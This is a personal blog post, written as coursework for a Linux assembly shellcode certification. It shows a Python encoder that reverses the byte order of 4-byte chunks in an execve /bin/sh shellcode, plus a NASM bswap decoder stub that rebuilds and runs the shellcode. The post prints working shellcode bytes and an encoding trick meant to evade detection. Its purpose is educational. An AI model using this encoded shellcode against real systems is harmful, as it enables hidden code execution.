<!DOCTYPE html>
<html lang="en"><!--
 __  __                __                                     __
/\ \/\ \              /\ \             __                    /\ \
\ \ \_\ \   __  __    \_\ \      __   /\_\      __       ___ \ \ \/'\
 \ \  _  \ /\ \/\ \   /'_` \   /'__`\ \/\ \   /'__`\    /'___\\ \ , <
  \ \ \ \ \\ \ \_\ \ /\ \L\ \ /\  __/  \ \ \ /\ \L\.\_ /\ \__/ \ \ \\`\
   \ \_\ \_\\/`____ \\ \___,_\\ \____\ _\ \ \\ \__/.\_\\ \____\ \ \_\ \_\
    \/_/\/_/ `/___/> \\/__,_ / \/____//\ \_\ \\/__/\/_/ \/____/  \/_/\/_/
                /\___/                \ \____/
                \/__/                  \/___/

Powered by Hydejack v8.1.1 <https://hydejack.com/>
--><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><meta http-equiv="x-ua-compatible" content="ie=edge"><title>Writing a 64-bit custom encoder (reversed byte order of 4 byte chunks) | Silvia’s blog</title><meta name="generator" content="Jekyll v3.8.3" /><meta property="og:title" content="Writing a 64-bit custom encoder (reversed byte order of 4 byte chunks)" /><meta name="author" content="Silvia Väli" /><meta property="og:locale" content="en" /><meta name="description" content="This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification. The task for 4/7 assignment is to create a custom encoding scheme like shown in the course’s Insertion encoder chapter. The encoding scheme should be used on the execve-stack shellcode implemented during the course and then executed." /><meta property="og:description" content="This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification. The task for 4/7 assignment is to create a custom encoding scheme like shown in the course’s Insertion encoder chapter. The encoding scheme should be used on the execve-stack shellcode implemented during the course and then executed." /><link rel="canonical" href="http://localhost:4000/blog/2019-02-25-blog-SLAE4/" /><meta property="og:url" content="http://localhost:4000/blog/2019-02-25-blog-SLAE4/" /><meta property="og:site_name" content="Silvia’s blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-02-25T00:00:00+02:00" /> <script type="application/ld+json"> {"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/blog/2019-02-25-blog-SLAE4/"},"datePublished":"2019-02-25T00:00:00+02:00","headline":"Writing a 64-bit custom encoder (reversed byte order of 4 byte chunks)","url":"http://localhost:4000/blog/2019-02-25-blog-SLAE4/","publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"http://localhost:4000/assets/img/profile.jpg"},"name":"Silvia Väli"},"author":{"@type":"Person","name":"Silvia Väli"},"description":"This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification. The task for 4/7 assignment is to create a custom encoding scheme like shown in the course’s Insertion encoder chapter. The encoding scheme should be used on the execve-stack shellcode implemented during the course and then executed.","dateModified":"2019-02-25T00:00:00+02:00","@context":"http://schema.org"}</script><meta name="mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Silvia's blog"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="application-name" content="Silvia's blog"><meta name="msapplication-config" content="/assets/ieconfig.xml"><meta name="theme-color" content="rgb(25,55,71)"><meta name="generator" content="Hydejack v8.1.1" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Silvia's blog" /><link rel="alternate" href="http://localhost:4000/blog/2019-02-25-blog-SLAE4/" hreflang="en"><link rel="shortcut icon" href="/assets/icons/favicon.ico"><link rel="apple-touch-icon" href="/assets/icons/icon.png"><link rel="manifest" href="/assets/manifest.json"><link rel="dns-prefetch" href="https://fonts.googleapis.com"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="dns-prefetch" href="/" id="_baseURL"><link rel="dns-prefetch" href="/assets/js/hydejack-8.1.1.js" id="_hrefJS"><link rel="dns-prefetch" href="/sw.js" id="_hrefSW"><link rel="dns-prefetch" href="/assets/bower_components/fontfaceobserver/fontfaceobserver.standalone.js" id="_hrefFFO"><link rel="dns-prefetch" href="/assets/bower_components/katex/dist/katex.min.js" id="_hrefKatexJS"><link rel="dns-prefetch" href="/assets/bower_components/katex/dist/katex.min.css" id="_hrefKatexCSS"><link rel="dns-prefetch" href="/assets/img/swipe.svg" id="_hrefSwipeSVG"> <script>!function(e,t){"use strict";function n(e,t,n,r){e.addEventListener?e.addEventListener(t,n,r):e.attachEvent?e.attachEvent("on"+t,n):e["on"+t]=n}e.loadJS=function(e,r){var o=t.createElement("script");o.src=e,r&&n(o,"load",r,{once:!0});var a=t.scripts[0];return a.parentNode.insertBefore(o,a),o},e._loaded=!1,e.loadJSDeferred=function(r,o){function a(){e._loaded=!0,o&&n(d,"load",o,{once:!0});var r=t.scripts[0];r.parentNode.insertBefore(d,r)}var d=t.createElement("script");return d.src=r,e._loaded?a():n(e,"load",a,{once:!0}),d},e.setRel=e.setRelStylesheet=function(e){function n(){this.rel="stylesheet"}var r=t.getElementById(e);r.addEventListener?r.addEventListener("load",n,{once:!0}):r.onload=n}}(window,document); !function(a){"use strict";var b=function(b,c,d){function e(a){return h.body?a():void setTimeout(function(){e(a)})}function f(){i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"}var g,h=a.document,i=h.createElement("link");if(c)g=c;else{var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]}var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){g.parentNode.insertBefore(i,c?g:g.nextSibling)});var l=function(a){for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){l(a)})};return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i};"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b}("undefined"!=typeof global?global:this); !function(a){if(a.loadCSS){var b=loadCSS.relpreload={};if(b.support=function(){try{return a.document.createElement("link").relList.supports("preload")}catch(b){return!1}},b.poly=function(){for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)}},!b.support()){b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){b.poly(),a.clearInterval(c)}),a.attachEvent&&a.attachEvent("onload",function(){a.clearInterval(c)})}}}(this); </script> <script>!function(w, d) { w._noPushState = false; w._noDrawer = false; /**/ loadJS(d.getElementById('_hrefFFO').href, function() { if ('Promise' in w) Promise.all([ new FontFaceObserver('Noto Sans').load(), new FontFaceObserver('Roboto Slab').load(), ]).then(function f() { d.body.classList.add('font-active'); }, function() {}); }); /**/ }(window, document);</script> <!--[if gt IE 8]><!----><link rel="stylesheet" href="/assets/css/hydejack-8.1.1.css"><link rel="stylesheet" href="/assets/icomoon/style.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto+Slab:400|Noto+Sans:400,400i,700,700i"> <noscript><style> html { font-family: Noto Sans, Helvetica, Arial, sans-serif!important; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6, .heading { font-family: Roboto Slab, Helvetica, Arial, sans-serif!important; }</style></noscript><style id="_pageStyle"> .content a:not(.btn){color:#4fb1ba;border-color:rgba(79,177,186,0.2)}.content a:not(.btn):hover{border-color:#4fb1ba}:focus{outline-color:#4fb1ba !important}.btn-primary{color:#fff;background-color:#4fb1ba;border-color:#4fb1ba}.btn-primary:focus,.btn-primary.focus,.form-control:focus,.form-control.focus{box-shadow:0 0 0 3px rgba(79,177,186,0.5)}.btn-primary:hover,.btn-primary.hover{color:#fff;background-color:#409ba3;border-color:#409ba3}.btn-primary:disabled,.btn-primary.disabled{color:#fff;background-color:#4fb1ba;border-color:#4fb1ba}.btn-primary:active,.btn-primary.active{color:#fff;background-color:#409ba3;border-color:#409ba3}::selection{color:#fff;background:#4fb1ba}::-moz-selection{color:#fff;background:#4fb1ba}</style><!--<![endif]--><body><div id="_navbar" class="navbar fixed-top"><div class="content"><div class="nav-btn-bar"> <span class="sr-only">Jump to:</span> <a id="_menu" class="nav-btn no-hover fl" href="#_navigation"> <span class="sr-only">Navigation</span> <span class="icon-menu"></span> </a></div></div></div><hr class="sr-only" hidden /> <hy-push-state replace-ids="_main" link-selector="a[href]:not([href*='/assets/']):not(.external):not(.no-push-state)" duration="250" script-selector="script:not([type^='math/tex'])" prefetch ><main id="_main" class="content fade-in layout-post" role="main" data-color="rgb(79,177,186)" data-theme-color="rgb(25,55,71)" data-image="/assets/img/sidebar-bg.jpg" data-overlay ><article id="post-blog-blog-SLAE4" class="page post mb6" role="article"><header><h1 class="post-title"> Writing a 64-bit custom encoder (reversed byte order of 4 byte chunks)</h1><p class="post-date heading"> <time datetime="2019-02-25T00:00:00+02:00">25 Feb 2019</time> in <a href="/blog/" class="flip-title">Blog</a><div class="hr pb0"></div></header><p>This blog post has been created for completing the requirements of the <a href="https://www.pentesteracademy.com/course?id=7">SecurityTube Linux Assembly Expert Certification</a>. The task for 4/7 assignment is to create a custom encoding scheme like shown in the course’s Insertion encoder chapter. The encoding scheme should be used on the execve-stack shellcode implemented during the course and then executed.<p><b>Student ID</b>: SLAE64 - 1594<h3 id="encoding-scheme">Encoding scheme</h3><p>I decided to implement an encoding scheme where I would divide the shellcode into 4 byte chunks and reverse the byte order in all of the chunks. For that to work, I also needed to check that the number of total bytes would be divisible by 4. For this I made the check in the python program code below <code class="highlighter-rouge">if (length%4 != 0)</code>. If it turned out that the number of bytes of the shellcode I am using was not divisible by 4 I padded the shellcode with <code class="highlighter-rouge">\x90</code>-s as also seen on the picture below.<p>
  <hy-img root-margin="512px"  src="/assets/img/SLAE/encoding.png" alt="" >
    <noscript><img data-ignore  src="/assets/img/SLAE/encoding.png" alt="" /></noscript>
    <span class="loading" slot="loading" hidden>
      <span class="icon-cog"></span>
    </span>
  </hy-img><p>So the final encoder.py looks as follows:<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#execve stack shellcode from SLAE64 course
import binascii

j = 3
i = 0

shellcode = "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
shellarray = bytearray(shellcode)
length = len(shellarray)
encoded = []

encoded_shellcode = shellcode.encode('hex')
input = "Input: "+ r"\x" + r"\x".join(encoded_shellcode[n:n+2] for n in range(0, len(encoded_shellcode),2))
print input

#print "Old length: %s" % length

if (length%4 != 0):
	adding = 4 -(length%4)
	for i in range (adding):
		shellarray.append(0x90)

#print "New length with \\x90-s appended: %s" % len(shellarray)

#changing positions
while(j &lt;= len(shellarray)):
	for i in range(4):
		encoded.append(shellarray[j-i])
	j = j + 4

output = binascii.hexlify(bytearray(encoded))
result = "Output (\\xXX format):" + r"\x" + r"\x".join(output[n : n+2] for n in range(0, len(output), 2))
print result
result2 = "Output (0xXX format): " + r"0x" + r",0x".join(output[n : n+2] for n in range(0, len(output), 2))
print result2



# Input: \x48\x31\xc0\x50 \x48\xbb\x2f\x62 \x69\x6e\x2f\x73 \x68\x53\x48\x89 \xe7\x50\x48\x89 \xe2\x57\x48\x89 \xe6\x48\x83\xc0 \x3b\x0f\x05
# Output \x50\xc0\x31\x48 \x62\x2f\xbb\x48 \x73\x2f\x6e\x69 \x89\x48\x53\x68 \x89\x48\x50\xe7 \x89\x48\x57\xe2 \xc0\x83\x48\xe6 \x90\x05\x0f\x3b

</code></pre></div></div><p>Output:<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ python ./encoder.py
Input: \x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05
Output (\xXX format):\x50\xc0\x31\x48\x62\x2f\xbb\x48\x2f\x2f\x6e\x69\x48\x53\x68\x73\x48\x50\xe7\x89\x48\x57\xe2\x89\x83\x48\xe6
\x89\x05\x0f\x3b\xc0
Output (0xXX format): 0x50,0xc0,0x31,0x48,0x62,0x2f,0xbb,0x48,0x2f,0x2f,0x6e,0x69,0x48,0x53,0x68,0x73,0x48,0x50,0xe7,0x89,0x48,0x57,
0xe2,0x89,0x83,0x48,0xe6,0x89,0x05,0x0f,0x3b,0xc0
</code></pre></div></div><h3 id="go-simple-or-go-home---htonl">Go simple or go home - htonl()</h3><p>In order for this encoder scheme to be useful for us, we should also implement the decoder stub for that particular encoding. Funnily enough I thought implementing the decoder for that would be super difficult and I would need to keep note of where I am currently in the decoded hex string, where are all the <code class="highlighter-rouge">4th*X</code> bytes and when does the hex string end, but that turned out to be wrong assumption. One evening I was thinking of my egghunter solution where I used an <code class="highlighter-rouge">access</code> syscall for something that it was not really intended for. That funnily brought me to <code class="highlighter-rouge">htonl()</code> function in C which I have previously used to convert something to network byte order. BECAUSE … it also operates on data in 4 byte chunks and reverses the byte order. How convenient! So I made a quick example with <code class="highlighter-rouge">htonl()</code> to see what instructions it is made up of in assembly and it turned out I only needed 1 instruction <code class="highlighter-rouge">bswap</code>.<p><b>htonl.c example</b>:<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//$ gcc htonl.c -o htonl
//$ gdb ./htonl

#include &lt;arpa/inet.h&gt;
int main() {
  int server_fd = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in server;
  server.sin_family = AF_INET;
  server.sin_port = htonl(80808080);
  server.sin_addr.s_addr = htonl(INADDR_ANY);
  // ...
  return 0;
}
</code></pre></div></div><p>
  <hy-img root-margin="512px"  src="/assets/img/SLAE/htonl.png" alt="" >
    <noscript><img data-ignore  src="/assets/img/SLAE/htonl.png" alt="" /></noscript>
    <span class="loading" slot="loading" hidden>
      <span class="icon-cog"></span>
    </span>
  </hy-img><h3 id="decoder">Decoder</h3><p>That single instruction - <code class="highlighter-rouge">bswap</code> - turned out to be the key to an easy solve for this decoder routine. The rest of the program is built using the JCP (Jmp-CALL-Pop) technique to get the address of encoded_shellcode to RBX via <code class="highlighter-rouge">pop rbx</code>. In order to save the decoded shellcode somewhere on the stack in <code class="highlighter-rouge">allocate_space</code> I am allocating the length of shellcode worth of space and saving the beginning address of decoded shellcode to R10 for later use. In <code class="highlighter-rouge">cmp</code> section I am performing the check to see if I have reached to the end of the shellcode yet.<p>The <code class="highlighter-rouge">decode</code> section is undeniably the most important part here. This is where I use RBX to get the address of 1st byte in a 4-byte chunk and then iterating RCX to move from one 4-byte chunk to the next while using bswap to reverse the byte order back to its original order.<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>global _start

section .text

_start:

	jmp find_address

decoder:
	pop rbx                   ;get the address of the encoded_shellcode
	xor rdi, rdi
	xor rcx, RCX              ;counter

allocate_space:
	sub rsp, 0x20             ;allocate space depending on the length of your shellcode
	mov r10, rsp
	jmp decode

cmp:
	inc rcx
	cmp rcx, 0x20             ;32 - length of the shellcode
	jge decoded_shell

decode:
	mov edi, dword [rbx+rcx]
	bswap edi                 ;reverse the order of 4 bytes
	mov dword [rsp], edi
	add rcx, 4
	add rsp, 4

	loop cmp

find_address:
	call decoder

	encoded_shellcode:	db	0x50,0xc0,0x31,0x48,0x62,0x2f,0xbb,0x48,0x2f,0x2f,0x6e,0x69,0x48,
    0x53,0x68,0x73,0x48,0x50,0xe7,0x89,0x48,0x57,0xe2,0x89,0x83,0x48,0xe6,0x89,0x05,0x0f,0x3b,0xc0


decoded_shell:
	mov rsp, r10        ;get back to the top of the decoded shell on stack
	push r10        ;put the address where decoded shell resides to the top of the stack so we can ret to it
	ret
</code></pre></div></div><h3 id="assemble-link-and-go">Assemble, link and go</h3><div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nasm -felf64 decoder.nasm -o decoder.o
$ ld decoder.o -o decoder
$ ./decoder

$whoami
silvia
</code></pre></div></div><hr /><ul><li>Encoder.py<br /> <a href="https://github.com/silviavali/SLAE/blob/master/task4/encoder.py">https://github.com/silviavali/SLAE/blob/master/task4/encoder.py</a><li>Decoder.nasm: <br /><a href="https://github.com/silviavali/SLAE/blob/master/task4/decoder.nasm">https://github.com/silviavali/SLAE/blob/master/task4/decoder.nasm</a></ul><h4 id="related-posts">Related posts:</h4><ul><li><a href="https://silviavali.github.io/blog/2019-01-15-blog-SLAE1/">64-bit bindshell with a passphrase protection</a><li><a href="https://silviavali.github.io/blog/2019-01-25-blog-SLAE2/">64-bit reverse shell with passphrase protection</a><li><a href="https://silviavali.github.io/blog/2019-02-25-blog-SLAE3/">Egghunter (64-bit Linux) using access() syscall</a><li><a href="https://silviavali.github.io/blog/2019-02-25-blog-SLAE4/">Writing a 64-bit custom encoder (reversed byte order of 4 byte chunks)</a><li><a href="https://silviavali.github.io/blog/2019-05-01-blog-SLAE51/">Msfvenom generated Exec shellcode analysis - exec shellcode</a><li><a href="https://silviavali.github.io/blog/2019-05-01-blog-SLAE52/">Msfvenom generated bind_tcp shellcode analysis</a><li><a href="https://silviavali.github.io/blog/2019-05-01-blog-SLAE53/">Msfvenom generated shell_reverse_tcp payload</a><li><a href="https://silviavali.github.io/blog/2019-05-01-blog-SLAE6/">Polymorphic shellcodes for samples taken from Shell-Storm</a><li><a href="https://silviavali.github.io/blog/2019-05-01-blog-SLAE7/">Custom encrypter - One-time pad (OTP)</a></ul></article><hr class="dingbat related" /><aside class="about related mt4 mb4" role="complementary"><div class="author mt4"> <hy-img src="/assets/img/profile.jpg" class="avatar" alt="Silvia Väli" root-margin="512px" > <noscript><img data-ignore src="/assets/img/profile.jpg" class="avatar" alt="Silvia Väli" /></noscript> <span class="loading" slot="loading" hidden> <span class="icon-cog"></span> </span> </hy-img><h2 class="page-title hr"> About</h2><p>My name is Silvia. This blog just contains various things that interest me, but probably relatively more assembly stuff. I count myself quite new to the ITsec community as I am only 2 years in.<div class="sidebar-social"> <span class="sr-only">Social:</span><ul><li> <a href="https://twitter.com/silviavaliSV" title="Twitter" class="no-mark-external"> <span class="icon-twitter"></span> <span class="sr-only">Twitter</span> </a><li> <a href="https://github.com/silviavali" title="GitHub" class="no-mark-external"> <span class="icon-github"></span> <span class="sr-only">GitHub</span> </a></ul></div></div></aside><aside class="related mb4" role="complementary"><h2 class="hr">Related Posts</h2><ul class="related-posts"><li> <a href="/blog/2019-05-02-blog-SLAE7/" class="h4 flip-title"> <span>Custom encrypter - One-time pad (OTP)</span> </a> <time class="heading faded fine" datetime="2019-05-02T00:00:00+03:00">02 May 2019</time><li> <a href="/blog/2019-05-01-blog-SLAE6/" class="h4 flip-title"> <span>Polymorphic shellcodes for samples taken from Shell-Storm</span> </a> <time class="heading faded fine" datetime="2019-05-01T00:00:00+03:00">01 May 2019</time><li> <a href="/blog/2019-05-01-blog-SLAE53/" class="h4 flip-title"> <span>Msfvenom generated shell_reverse_tcp payload</span> </a> <time class="heading faded fine" datetime="2019-05-01T00:00:00+03:00">01 May 2019</time></ul></aside><footer role="contentinfo"><hr/><p><small class="copyright">© 2019. All rights reserved. </small><p><small>Powered by <a class="external" href="https://hydejack.com/">Hydejack</a> v<span id="_version">8.1.1</span></small><hr class="sr-only"/></footer></main><hy-drawer class="" align="left" threshold="10" touch-events prevent-default ><header id="_sidebar" class="sidebar" role="banner"><div class="sidebar-bg sidebar-overlay" style="background-color:rgb(25,55,71);background-image:url(/assets/img/sidebar-bg.jpg)"></div><div class="sidebar-sticky"><div class="sidebar-about"> <a class="no-hover" href="/" tabindex="-1"> <img src="/assets/img/profile.jpg" class="avatar" alt="Silvia's blog" data-ignore /> </a><h2 class="h1"><a href="/">Silvia's blog</a></h2><p class=""> Random notes or stuff I am curious about.</div><nav class="sidebar-nav heading" role="navigation"> <span class="sr-only">Navigation:</span><ul><li> <a id="_navigation" href="/blog/" class="sidebar-nav-item active" > Blog </a><li> <a href="/about/" class="sidebar-nav-item" > About </a><li> <a href="/cheatsheet/" class="sidebar-nav-item" > Notes for TalTech A&D course </a></ul></nav><div class="sidebar-social"> <span class="sr-only">Social:</span><ul><li> <a href="https://twitter.com/silviavaliSV" title="Twitter" class="no-mark-external"> <span class="icon-twitter"></span> <span class="sr-only">Twitter</span> </a><li> <a href="https://github.com/silviavali" title="GitHub" class="no-mark-external"> <span class="icon-github"></span> <span class="sr-only">GitHub</span> </a></ul></div></div></header></hy-drawer><hr class="sr-only" hidden /> </hy-push-state> <!--[if !IE]><!----> <script>loadJSDeferred(document.getElementById('_hrefJS').href);</script> <!--<![endif]--> <script>!function(w, d) { w.ga=w.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date; /**/ ga('create', 'UA-137562580-1', 'auto'); /**/ var pushStateEl = d.getElementsByTagName('hy-push-state')[0]; var timeoutId; pushStateEl.addEventListener('hy-push-state-load', function() { w.clearTimeout(timeoutId); timeoutId = w.setTimeout(function() { ga('set', 'page', w.location.pathname); ga('send', 'pageview'); }, 500); }); d.addEventListener('hy--cookies-ok', function () { w.ga(function(tracker) { w.ga("set", "anonymizeIp", undefined); localStorage && localStorage.setItem("ga--client-id", tracker.get("clientId")); }); }); w.loadJSDeferred('https://www.google-analytics.com/analytics.js'); }(window, document);</script> <script> if ('serviceWorker' in navigator) { navigator.serviceWorker.getRegistration() .then(r => r.unregister()) .catch(() => {}); } </script><h2 class="sr-only" hidden>Templates (for web app):</h2><template id="_animation-template" hidden><div class="animation-main fixed-top"><div class="content"><div class="page"></div></div></div></template> <template id="_loading-template" hidden><div class="loading nav-btn fr"> <span class="sr-only">Loading…</span> <span class="icon-cog"></span></div></template> <template id="_error-template" hidden><div class="page"><h1 class="page-title">Error</h1><p class="lead"> Sorry, an error occurred while loading <a class="this-link" href=""></a>.</div></template> <template id="_back-template" hidden> <a id="_back" class="back nav-btn fl no-hover"> <span class="sr-only">Back</span> <span class="icon-arrow-left2"></span> </a> </template> <template id="_permalink-template" hidden> <a href="#" class="permalink"> <span class="sr-only">Permalink</span> <span class="icon-link"></span> </a> </template></html>
